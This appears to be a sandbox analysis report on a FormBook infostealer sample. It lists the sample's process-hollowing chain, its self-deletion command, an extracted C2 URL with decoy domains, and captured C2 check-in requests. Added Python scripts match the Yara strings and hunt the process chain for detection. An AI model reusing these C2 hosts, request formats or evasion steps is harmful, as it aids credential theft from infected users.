Windows Analysis Report
inlaww321345.exe

Overview

General Information

Sample Name: inlaww321345.exe
Analysis ID: 626561
MD5: 43e64e0ab6ca479c2af3afed56216a91
SHA1: 983a822ffde2b558dfe2a8ac1dcc4d42df0f1d94
SHA256: cbdf1e33bc694b1ca634a4b042bd010050c9baf99078c91adf961ef92cebd305
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • inlaww321345.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\inlaww321345.exe" MD5: 43E64E0AB6CA479C2AF3AFED56216A91)
    • idczzzzbpy.exe (PID: 6492 cmdline: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk MD5: 0A3F789C1F124B76E2EDC74EBEACF70A)
      • idczzzzbpy.exe (PID: 6516 cmdline: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk MD5: 0A3F789C1F124B76E2EDC74EBEACF70A)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • chkdsk.exe (PID: 6248 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
            • cmd.exe (PID: 6368 cmdline: /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Malware Configuration

FormBook
{"C2 list": ["www.boxberry-my.com/sn31/"],
 "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}

The configuration holds one C2 entry (host plus URI path "/sn31/") and 64 decoy domains; the captured traffic below shows the same "/sn31/" path requested at decoy hosts (www.informacion-numero-24-h.site, www.tzjisheng.com), so the path, not the host, is the stable network indicator.
Yara Overview: Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(28 further memory-dump entries are not included in this capture)

Yara Overview: Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Source: 1.2.idczzzzbpy.exe.700000.1.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 1.2.idczzzzbpy.exe.700000.1.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(22 further unpacked-PE entries are not included in this capture)
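The hex strings in the two rules above are plain x86 code fragments, and it helps to see what they encode: $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) is add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the RDTSC timing probe that the "Tries to detect virtualization through RDTSC time measurements" signature refers to, and each JPCERT/CC string is a 5-byte push imm32 (opcode 68) whose immediate, per the string names, is a hashed sqlite3 API name. The script below is an added example, not Joe Sandbox, Malpedia or JPCERT/CC code: it copies the strings and offsets from the 2.2.idczzzzbpy.exe.400000.1.raw.unpack entry, writes them into a constructed zero-filled image at those offsets, scans for them, and decodes the push immediates. The rule conditions (how many strings must hit) are not shown in the report, so the threshold in matches() is an assumption.

```python
"""Scan a memory image for the Formbook Yara strings listed in the report.

Added example.  The image is constructed (zero-filled with each string
written at the offset the report lists), so the offsets it reports are
those of this toy image, not of the real sandbox dump.
"""
import re

# Formbook_1 (yara-signator, Felix Bilstein): (hex string, reported offsets).
FORMBOOK_1 = {
    "$sequence_0": ("03 C8 0F 31 2B C1 89 45 FC", [0x9908, 0x9B82]),  # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "$sequence_1": ("3C 24 0F 84 76 FF FF FF 3C 25 74 94", [0x156B5]),
    "$sequence_2": ("3B 4F 14 73 95 85 C9 74 91", [0x151A1]),
    "$sequence_3": ("3C 69 75 44 8B 7D 18 8B 0F", [0x157B7]),
    "$sequence_4": ("5D C3 8D 50 7C 80 FA 07", [0x1592F]),
    "$sequence_5": ("0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06", [0xA59A]),
    "$sequence_6": ("57 89 45 FC 89 45 F4 89 45 F8", [0x1441C]),
    "$sequence_7": ("66 89 0C 02 5B 8B E5 5D", [0xB293]),
    "$sequence_8": ("3C 54 74 04 3C 74 75 F4", [0x1B927]),
    "$sequence_9": ("56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00", [0x1C92A]),
}
# Formbook (JPCERT/CC): each string is 'push imm32' of a hashed sqlite3 name.
FORMBOOK_JPCERT = {
    "$sqlite3step": ("68 34 1C 7B E1", [0x18849, 0x1895C]),
    "$sqlite3text": ("68 38 2A 90 C5", [0x18878, 0x1899D]),
    "$sqlite3blob": ("68 53 D8 7F 8C", [0x1888B, 0x189B3]),
}


def hexbytes(hex_string):
    """'03 C8 0F' -> b'\\x03\\xc8\\x0f'."""
    return bytes.fromhex(hex_string.replace(" ", ""))


def build_image(size=0x20000):
    """Constructed image: zeros, with every rule string at its reported offset."""
    img = bytearray(size)
    for rule in (FORMBOOK_1, FORMBOOK_JPCERT):
        for hex_string, offsets in rule.values():
            pattern = hexbytes(hex_string)
            for off in offsets:
                img[off:off + len(pattern)] = pattern
    return bytes(img)


def scan(image, rule):
    """Return {string_name: [offsets]} for every rule string found in image."""
    hits = {}
    for name, (hex_string, _) in rule.items():
        pattern = re.escape(hexbytes(hex_string))
        offsets = [m.start() for m in re.finditer(pattern, image)]
        if offsets:
            hits[name] = offsets
    return hits


def matches(image, rule, min_strings):
    """Assumed condition: at least min_strings distinct strings present."""
    return len(scan(image, rule)) >= min_strings


def push_imm32(code):
    """Decode a 5-byte x86 'push imm32' (68 xx xx xx xx), immediate little-endian."""
    if len(code) == 5 and code[0] == 0x68:
        return int.from_bytes(code[1:], "little")
    return None


if __name__ == "__main__":
    image = build_image()
    for name, offsets in scan(image, FORMBOOK_1).items():
        print(name, [hex(o) for o in offsets])
    for name, (hex_string, _) in FORMBOOK_JPCERT.items():
        print(name, hex(push_imm32(hexbytes(hex_string))))
```

Running it reproduces the offsets listed in the report for that dump and prints the three pushed constants (0xE17B1C34, 0xC5902A38, 0x8C7FD853); those immediates, rather than the surrounding bytes, are what to search for when the code has been relocated or re-linked.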
          No Sigma rule has matched
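No Sigma rule fired, but the process tree in the Classification section carries three host-side anomalies worth a hunting rule: the dropped idczzzzbpy.exe relaunches itself with an identical command line (consistent with the "Creates a process in suspended mode" and "Sample uses process hollowing technique" signatures), explorer.exe then starts C:\Windows\SysWOW64\chkdsk.exe with no arguments on a 64-bit host, and that chkdsk.exe runs cmd.exe with /c del on the dropped executable. The following is an added example, not part of the report and not a Sigma rule: the event records are constructed from the tree above (PIDs, images and command lines as listed), the (pid, ppid, image, cmdline) layout is an assumed Sysmon-like schema, the image directory for cmd.exe is assumed (the report gives only its name), and explorer.exe is given parent 0 because the report's nesting reflects injection, not real parentage.

```python
"""Hunting logic over process-creation events for the FormBook execution chain.

Added example.  EVENTS is constructed from the report's process tree; the
record layout is an assumed Sysmon-like schema.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's process tree.  explorer.exe sits beneath
# idczzzzbpy.exe there because the sandbox follows the injection into it; its
# real parent PID is not in the report, so 0 is used (assumption).  The
# directory of cmd.exe is likewise assumed.
EVENTS = [
    ProcEvent(6464, 0, r"C:\Users\user\Desktop\inlaww321345.exe",
              r'"C:\Users\user\Desktop\inlaww321345.exe"'),
    ProcEvent(6492, 6464, r"C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe",
              r"C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk"),
    ProcEvent(6516, 6492, r"C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe",
              r"C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk"),
    ProcEvent(3968, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(6248, 3968, r"C:\Windows\SysWOW64\chkdsk.exe", r"C:\Windows\SysWOW64\chkdsk.exe"),
    ProcEvent(6368, 6248, r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"'),
    ProcEvent(1804, 6368, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData\\Local\\Temp|Desktop)\\", re.I)
# The 64-bit shell launches System32 copies; a bare SysWOW64 utility under
# explorer.exe is the injected-explorer artifact seen in the report.
WOW64_DIR = re.compile(r"^C:\\Windows\\SysWOW64\\", re.I)
DEL_TEMP_EXE = re.compile(r'/c\s+del\s+"?[^"]*\\AppData\\Local\\Temp\\[^"\\]+\.exe"?', re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _unquoted(cmdline):
    return cmdline.strip().strip('"').lower()


def hunt(events):
    """Return [(rule_name, pid)] for every event that trips one of the rules."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # R1: a binary in a user-writable directory relaunches itself with the
        # same command line (suspended-child / hollowing pattern).
        if (parent is not None and USER_WRITABLE.search(e.image)
                and e.image.lower() == parent.image.lower()
                and e.cmdline == parent.cmdline):
            findings.append(("self_relaunch_from_user_dir", e.pid))
        # R2: explorer.exe starts a SysWOW64 utility whose command line is
        # nothing but its own path.
        if (parent is not None and _basename(parent.image) == "explorer.exe"
                and WOW64_DIR.match(e.image)
                and _unquoted(e.cmdline) == e.image.lower()):
            findings.append(("explorer_spawns_bare_wow64_utility", e.pid))
        # R3: cmd.exe deleting an .exe under %TEMP% (dropper self-deletion).
        if _basename(e.image) == "cmd.exe" and DEL_TEMP_EXE.search(e.cmdline):
            findings.append(("cmd_deletes_temp_exe", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in hunt(EVENTS):
        print(f"{rule}: pid {pid}")
```

Each rule is cheap on its own and noisy on its own; the value is in the chain, so in a real pipeline the three findings should be joined on the parent-child links (6492 to 6516, 3968 to 6248 to 6368) before alerting.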
Snort IDS Alerts

Timestamp: 05/14/22-13:08:49.696707
Source: 192.168.2.3:49808
Destination: 188.114.96.10:80
SID: 2031449
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/14/22-13:08:49.696707
Source: 192.168.2.3:49808
Destination: 188.114.96.10:80
SID: 2031453
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/14/22-13:08:49.696707
Source: 192.168.2.3:49808
Destination: 188.114.96.10:80
SID: 2031412
Protocol: TCP
Classtype: A Network Trojan was detected

          AV Detection

Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (the configuration shown above: C2 www.boxberry-my.com/sn31/ plus 64 decoy domains)
Source: inlaww321345.exe | Virustotal: Detection: 53%
Source: inlaww321345.exe | ReversingLabs: Detection: 56%
Source: Yara match | File source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: www.boxberry-my.com/sn31/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | ReversingLabs: Detection: 46%
Source: inlaww321345.exe | Joe Sandbox ML: detected
Source: 2.0.idczzzzbpy.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.idczzzzbpy.exe.700000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.idczzzzbpy.exe.400000.9.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.idczzzzbpy.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.idczzzzbpy.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: inlaww321345.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: inlaww321345.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\nwmcc\xasivn\insq\a82874181cac4c8c8d839f9e6026f5f4\nkrdof\moxadzwk\Release\moxadzwk.pdb source: inlaww321345.exe, 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp, idczzzzbpy.exe, 00000001.00000000.239867122.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000002.00000000.244915451.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, chkdsk.exe, 00000010.00000002.507707421.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.509886446.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, nsuD94B.tmp.0.dr, idczzzzbpy.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: idczzzzbpy.exe, 00000001.00000003.245625219.000000001A210000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000001.00000003.242881004.000000001A080000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: idczzzzbpy.exe, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\inlaww321345.exe | Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\inlaww321345.exe | Code function: 0_2_004069A4 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\inlaww321345.exe | Code function: 0_2_0040290B FindFirstFileW,
Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop edi

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 188.114.96.10 80
Source: C:\Windows\explorer.exe | Network Connect: 154.85.152.171 80
Source: C:\Windows\explorer.exe | Domain query: www.informacion-numero-24-h.site
Source: C:\Windows\explorer.exe | Domain query: www.tzjisheng.com
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
Source: DNS query: www.rodosmail.xyz
Source: Malware configuration extractor | URLs: www.boxberry-my.com/sn31/
Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected:
  GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1
  Host: www.informacion-numero-24-h.site
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: nothing printable)
Source: global traffic | HTTP traffic detected:
  GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1
  Host: www.tzjisheng.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: nothing printable)
Source: Joe Sandbox View | IP Address: 188.114.96.10
Source: inlaww321345.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: unknown | DNS traffic detected: queries for: www.informacion-numero-24-h.site
Source: C:\Users\user\Desktop\inlaww321345.exe | Code function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

Both captured requests share the "/sn31/" path from the configuration, carry no User-Agent header (the "HTTP GET or POST without a user agent" signature), use "Connection: close", and are sent to decoy domains from the configuration with a "www." prefix; the 3fK84j query parameter has the same value in both, while p6Ah differs.
